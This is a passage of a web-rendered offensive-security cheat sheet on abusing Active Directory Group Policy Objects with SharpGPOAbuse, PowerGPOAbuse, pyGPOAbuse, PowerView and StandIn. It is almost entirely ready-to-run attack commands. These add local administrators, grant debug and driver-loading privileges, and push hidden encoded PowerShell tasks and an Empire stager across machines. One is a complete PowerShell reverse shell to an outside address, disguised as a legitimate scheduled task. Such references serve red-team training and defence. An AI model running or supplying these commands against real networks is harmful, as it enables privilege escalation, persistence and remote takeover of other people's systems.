<a id="__codelineno-1-18" name="__codelineno-1-18" href="#__codelineno-1-18"></a><span class="p">.\</span><span class="n">SharpGPOAbuse</span><span class="p">.</span><span class="n">exe</span> <span class="p">-</span><span class="n">-AddComputerTask</span> <span class="p">-</span><span class="n">-GPOName</span> <span class="s2">&quot;VULNERABLE_GPO&quot;</span> <span class="p">-</span><span class="n">-Author</span> <span class="s1">&#39;LAB.LOCAL\User&#39;</span> <span class="p">-</span><span class="n">-TaskName</span> <span class="s2">&quot;EvilTask&quot;</span> <span class="p">-</span><span class="n">-Arguments</span> <span class="s2">&quot;/c powershell.exe -nop -w hidden -enc BASE64_ENCODED_COMMAND &quot;</span> <span class="p">-</span><span class="n">-Command</span> <span class="s2">&quot;cmd.exe&quot;</span> <span class="p">-</span><span class="n">-Force</span>
</code></pre></div>
<h2 id="abuse-gpo-with-powergpoabuse">Abuse GPO with PowerGPOAbuse</h2>
<ul>
<li>https://github.com/rootSySdk/PowerGPOAbuse</li>
</ul>
<div class="highlight"><pre><span></span><code><a id="__codelineno-2-1" name="__codelineno-2-1" href="#__codelineno-2-1"></a><span class="n">PS</span><span class="p">&gt;</span> <span class="p">.</span> <span class="p">.\</span><span class="n">PowerGPOAbuse</span><span class="p">.</span><span class="n">ps1</span>
<a id="__codelineno-2-2" name="__codelineno-2-2" href="#__codelineno-2-2"></a>
<a id="__codelineno-2-3" name="__codelineno-2-3" href="#__codelineno-2-3"></a><span class="c"># Adding a localadmin </span>
<a id="__codelineno-2-4" name="__codelineno-2-4" href="#__codelineno-2-4"></a><span class="n">PS</span><span class="p">&gt;</span> <span class="nb">Add-LocalAdmin</span> <span class="n">-Identity</span> <span class="s1">&#39;Bobby&#39;</span> <span class="n">-GPOIdentity</span> <span class="s1">&#39;SuperSecureGPO&#39;</span>
<a id="__codelineno-2-5" name="__codelineno-2-5" href="#__codelineno-2-5"></a>
<a id="__codelineno-2-6" name="__codelineno-2-6" href="#__codelineno-2-6"></a><span class="c"># Assign a new right </span>
<a id="__codelineno-2-7" name="__codelineno-2-7" href="#__codelineno-2-7"></a><span class="n">PS</span><span class="p">&gt;</span> <span class="nb">Add-UserRights</span> <span class="n">-Rights</span> <span class="s2">&quot;SeLoadDriverPrivilege&quot;</span><span class="p">,</span><span class="s2">&quot;SeDebugPrivilege&quot;</span> <span class="n">-Identity</span> <span class="s1">&#39;Bobby&#39;</span> <span class="n">-GPOIdentity</span> <span class="s1">&#39;SuperSecureGPO&#39;</span>
<a id="__codelineno-2-8" name="__codelineno-2-8" href="#__codelineno-2-8"></a>
<a id="__codelineno-2-9" name="__codelineno-2-9" href="#__codelineno-2-9"></a><span class="c"># Adding a New Computer/User script </span>
<a id="__codelineno-2-10" name="__codelineno-2-10" href="#__codelineno-2-10"></a><span class="n">PS</span><span class="p">&gt;</span> <span class="nb">Add-ComputerScript</span><span class="p">/</span><span class="nb">Add-UserScript</span> <span class="n">-ScriptName</span> <span class="s1">&#39;EvilScript&#39;</span> <span class="n">-ScriptContent</span> <span class="p">$(</span><span class="nb">Get-Content</span> <span class="n">evil</span><span class="p">.</span><span class="n">ps1</span><span class="p">)</span> <span class="n">-GPOIdentity</span> <span class="s1">&#39;SuperSecureGPO&#39;</span>
<a id="__codelineno-2-11" name="__codelineno-2-11" href="#__codelineno-2-11"></a>
<a id="__codelineno-2-12" name="__codelineno-2-12" href="#__codelineno-2-12"></a><span class="c"># Create an immediate task </span>
<a id="__codelineno-2-13" name="__codelineno-2-13" href="#__codelineno-2-13"></a><span class="n">PS</span><span class="p">&gt;</span> <span class="nb">Add-GPOImmediateTask</span> <span class="n">-TaskName</span> <span class="s1">&#39;eviltask&#39;</span> <span class="n">-Command</span> <span class="s1">&#39;powershell.exe /c&#39;</span> <span class="n">-CommandArguments</span> <span class="s2">&quot;&#39;</span><span class="p">$(</span><span class="nb">Get-Content</span> <span class="n">evil</span><span class="p">.</span><span class="n">ps1</span><span class="p">)</span><span class="s2">&#39;&quot;</span> <span class="n">-Author</span> <span class="n">Administrator</span> <span class="n">-Scope</span> <span class="n">Computer</span><span class="p">/</span><span class="n">User</span> <span class="n">-GPOIdentity</span> <span class="s1">&#39;SuperSecureGPO&#39;</span>
</code></pre></div>
<h2 id="abuse-gpo-with-pygpoabuse">Abuse GPO with pyGPOAbuse</h2>
<div class="highlight"><pre><span></span><code><a id="__codelineno-3-1" name="__codelineno-3-1" href="#__codelineno-3-1"></a><span class="p">$</span> <span class="n">git</span> <span class="n">clone</span> <span class="n">https</span><span class="p">://</span><span class="n">github</span><span class="p">.</span><span class="n">com</span><span class="p">/</span><span class="n">Hackndo</span><span class="p">/</span><span class="n">pyGPOAbuse</span>
<a id="__codelineno-3-2" name="__codelineno-3-2" href="#__codelineno-3-2"></a>
<a id="__codelineno-3-3" name="__codelineno-3-3" href="#__codelineno-3-3"></a><span class="c"># Add john user to local administrators group (Password: H4x00r123..)</span>
<a id="__codelineno-3-4" name="__codelineno-3-4" href="#__codelineno-3-4"></a><span class="p">./</span><span class="n">pygpoabuse</span><span class="p">.</span><span class="n">py</span> <span class="n">DOMAIN</span><span class="p">/</span><span class="n">user</span> <span class="n">-hashes</span> <span class="n">lm</span><span class="p">:</span><span class="n">nt</span> <span class="n">-gpo-id</span> <span class="s2">&quot;12345677-ABCD-9876-ABCD-123456789012&quot;</span>
<a id="__codelineno-3-5" name="__codelineno-3-5" href="#__codelineno-3-5"></a>
<a id="__codelineno-3-6" name="__codelineno-3-6" href="#__codelineno-3-6"></a><span class="c"># Reverse shell example</span>
<a id="__codelineno-3-7" name="__codelineno-3-7" href="#__codelineno-3-7"></a><span class="p">./</span><span class="n">pygpoabuse</span><span class="p">.</span><span class="n">py</span> <span class="n">DOMAIN</span><span class="p">/</span><span class="n">user</span> <span class="n">-hashes</span> <span class="n">lm</span><span class="p">:</span><span class="n">nt</span> <span class="n">-gpo-id</span> <span class="s2">&quot;12345677-ABCD-9876-ABCD-123456789012&quot;</span> <span class="p">\</span>
<a id="__codelineno-3-8" name="__codelineno-3-8" href="#__codelineno-3-8"></a> <span class="n">-powershell</span> <span class="p">\</span>
<a id="__codelineno-3-9" name="__codelineno-3-9" href="#__codelineno-3-9"></a> <span class="n">-command</span> <span class="s2">&quot;\$client = New-Object System.Net.Sockets.TCPClient(&#39;10.20.0.2&#39;,1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2&gt;&amp;1 | Out-String );\$sendback2 = \$sendback + &#39;PS &#39; + (pwd).Path + &#39;&gt; &#39;;\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()&quot;</span> <span class="p">\</span>
<a id="__codelineno-3-10" name="__codelineno-3-10" href="#__codelineno-3-10"></a> <span class="n">-taskname</span> <span class="s2">&quot;Completely Legit Task&quot;</span> <span class="p">\</span>
<a id="__codelineno-3-11" name="__codelineno-3-11" href="#__codelineno-3-11"></a> <span class="n">-description</span> <span class="s2">&quot;Dis is legit, pliz no delete&quot;</span> <span class="p">\</span>
<a id="__codelineno-3-12" name="__codelineno-3-12" href="#__codelineno-3-12"></a> <span class="n">-user</span>
</code></pre></div>
<h2 id="abuse-gpo-with-powerview">Abuse GPO with PowerView</h2>
<div class="highlight"><pre><span></span><code><a id="__codelineno-4-1" name="__codelineno-4-1" href="#__codelineno-4-1"></a><span class="c"># Enumerate GPO</span>
<a id="__codelineno-4-2" name="__codelineno-4-2" href="#__codelineno-4-2"></a><span class="nb">Get-NetGPO</span> <span class="p">|</span> <span class="p">%{</span><span class="nb">Get-ObjectAcl</span> <span class="n">-ResolveGUIDs</span> <span class="n">-Name</span> <span class="nv">$_</span><span class="p">.</span><span class="n">Name</span><span class="p">}</span>
<a id="__codelineno-4-3" name="__codelineno-4-3" href="#__codelineno-4-3"></a>
<a id="__codelineno-4-4" name="__codelineno-4-4" href="#__codelineno-4-4"></a><span class="c"># New-GPOImmediateTask to push an Empire stager out to machines via VulnGPO</span>
<a id="__codelineno-4-5" name="__codelineno-4-5" href="#__codelineno-4-5"></a><span class="nb">New-GPOImmediateTask</span> <span class="n">-TaskName</span> <span class="n">Debugging</span> <span class="n">-GPODisplayName</span> <span class="n">VulnGPO</span> <span class="n">-CommandArguments</span> <span class="s1">&#39;-NoP -NonI -W Hidden -Enc AAAAAAA...&#39;</span> <span class="n">-Force</span>
</code></pre></div>
<h2 id="abuse-gpo-with-standin">Abuse GPO with StandIn</h2>
<div class="highlight"><pre><span></span><code><a id="__codelineno-5-1" name="__codelineno-5-1" href="#__codelineno-5-1"></a><span class="c"># Add a local administrator</span>
<a id="__codelineno-5-2" name="__codelineno-5-2" href="#__codelineno-5-2"></a><span class="n">StandIn</span><span class="p">.</span><span class="n">exe</span> <span class="p">-</span><span class="n">-gpo</span> <span class="p">-</span><span class="n">-filter</span> <span class="n">Shards</span> <span class="p">-</span><span class="n">-localadmin</span> <span class="n">user002</span>
<a id="__codelineno-5-3" name="__codelineno-5-3" href="#__codelineno-5-3"></a>
<a id="__codelineno-5-4" name="__codelineno-5-4" href="#__codelineno-5-4"></a><span class="c"># Set custom right to a user</span>
<a id="__codelineno-5-5" name="__codelineno-5-5" href="#__codelineno-5-5"></a><span class="n">StandIn</span><span class="p">.</span><span class="n">exe</span> <span class="p">-</span><span class="n">-gpo</span> <span class="p">-</span><span class="n">-filter</span> <span class="n">Shards</span> <span class="p">-</span><span class="n">-setuserrights</span> <span class="n">user002</span> <span class="p">-</span><span class="n">-grant</span> <span class="s2">&quot;SeDebugPrivilege,SeLoadDriverPrivilege&quot;</span>
<a id="__codelineno-5-6" name="__codelineno-5-6" href="#__codelineno-5-6"></a>
<a id="__codelineno-5-7" name="__codelineno-5-7" href="#__codelineno-5-7"></a><span class="c"># Execute a custom command</span>
<a id="__codelineno-5-8" name="__codelineno-5-8" href="#__codelineno-5-8"></a><span class="n">StandIn</span><span class="p">.</span><span class="n">exe</span> <span class="p">-</span><span class="n">-gpo</span> <span class="p">-</span><span class="n">-filter</span> <span class="n">Shards</span> <span class="p">-</span><span class="n">-tasktype</span> <span class="n">computer</span> <span class="p">-</span><span class="n">-taskname</span> <span class="n">Liber</span> <span class="p">-</span><span class="n">-author</span> <span class="s2">&quot;REDHOOK\Administrator&quot;</span> <span class="p">-</span><span class="n">-command</span> <span class="s2">&quot;C:\I\do\the\thing.exe&quot;</span> <span class="p">-</span><span class="n">-args</span> <span class="s2">&quot;with args&quot;</span>
</code></pre></div>
<h2 id="references">References</h2>
<ul>
<li><a href="https://rastamouse.me/2019/01/gpo-abuse-part-1/">GPO Abuse - Part 1 - RastaMouse - 6 January 2019</a></li>
<li><a href="https://rastamouse.me/2019/01/gpo-abuse-part-2/">GPO Abuse - Part 2 - RastaMouse - 13 January 2019</a></li>
<li><a href="https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/">Abusing GPO Permissions - harmj0y - March 17, 2016</a></li>
<li><a href="https://pentestmag.com/gpo-abuse-you-cant-see-me/">GPO Abuse: "You can't see me" - Huy Kha - July 19, 2019</a></li>
<li><a href="https://wald0.com/?p=179">A Red Teamers Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0</a></li>
<li><a href="https://www.alteredsecurity.com/adlab">Training - Attacking and Defending Active Directory Lab - Altered Security</a></li>
</ul>
<aside class="md-source-file">
<span class="md-source-file__fact">
<span class="md-icon" title="Last update">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M21 13.1c-.1 0-.3.1-.4.2l-1 1 2.1 2.1 1-1c.2-.2.2-.6 0-.8l-1.3-1.3c-.1-.1-.2-.2-.4-.2m-1.9 1.8-6.1 6V23h2.1l6.1-6.1zM12.5 7v5.2l4 2.4-1 1L11 13V7zM11 21.9c-5.1-.5-9-4.8-9-9.9C2 6.5 6.5 2 12 2c5.3 0 9.6 4.1 10 9.3-.3-.1-.6-.2-1-.2s-.7.1-1 .2C19.6 7.2 16.2 4 12 4c-4.4 0-8 3.6-8 8 0 4.1 3.1 7.5 7.1 7.9l-.1.2z"/></svg>
</span>
<span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-date">November 9, 2024</span>
</span>
</aside>
<div class="social-container">
<b>Share this content</b>
<div class="a2a_kit a2a_kit_size_32 a2a_default_style">
<a class="a2a_dd" href="https://www.addtoany.com/share"></a>
<a class="a2a_button_x"></a>
<a class="a2a_button_telegram"></a>
<a class="a2a_button_linkedin"></a>
<a class="a2a_button_email"></a>
<a class="a2a_button_microsoft_teams"></a>
</div>
<br>
<script async src="https://static.addtoany.com/menu/page.js"></script>
</div>
<script defer src="https://cloud.umami.is/script.js" data-website-id="49aad71c-7d98-4635-8bd5-b6799c8874f8"></script>
</article>
</div>
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
</div>
<button type="button" class="md-top md-icon" data-md-component="top" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 20h-2V8l-5.5 5.5-1.42-1.42L12 4.16l7.92 7.92-1.42 1.42L13 8z"/></svg>
Back to top
</button>
</main>
<footer class="md-footer">
<div class="md-footer-meta md-typeset">
<div class="md-footer-meta__inner md-grid">
<div class="md-copyright">
Made with
<a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
Material for MkDocs
</a>
</div>
</div>
</div>
</footer>
</div>
<div class="md-dialog" data-md-component="dialog">
<div class="md-dialog__inner md-typeset"></div>
</div>
<script id="__config" type="application/json">{"base": "../..", "features": ["content.code.copy", "content.action.edit", "content.action.view", "content.tooltips", "navigation.tracking", "navigation.top", "search.share", "search.suggest"], "search": "../../assets/javascripts/workers/search.6ce7567c.min.js", "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}}</script>
<script src="../../assets/javascripts/bundle.83f73b43.min.js"></script>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink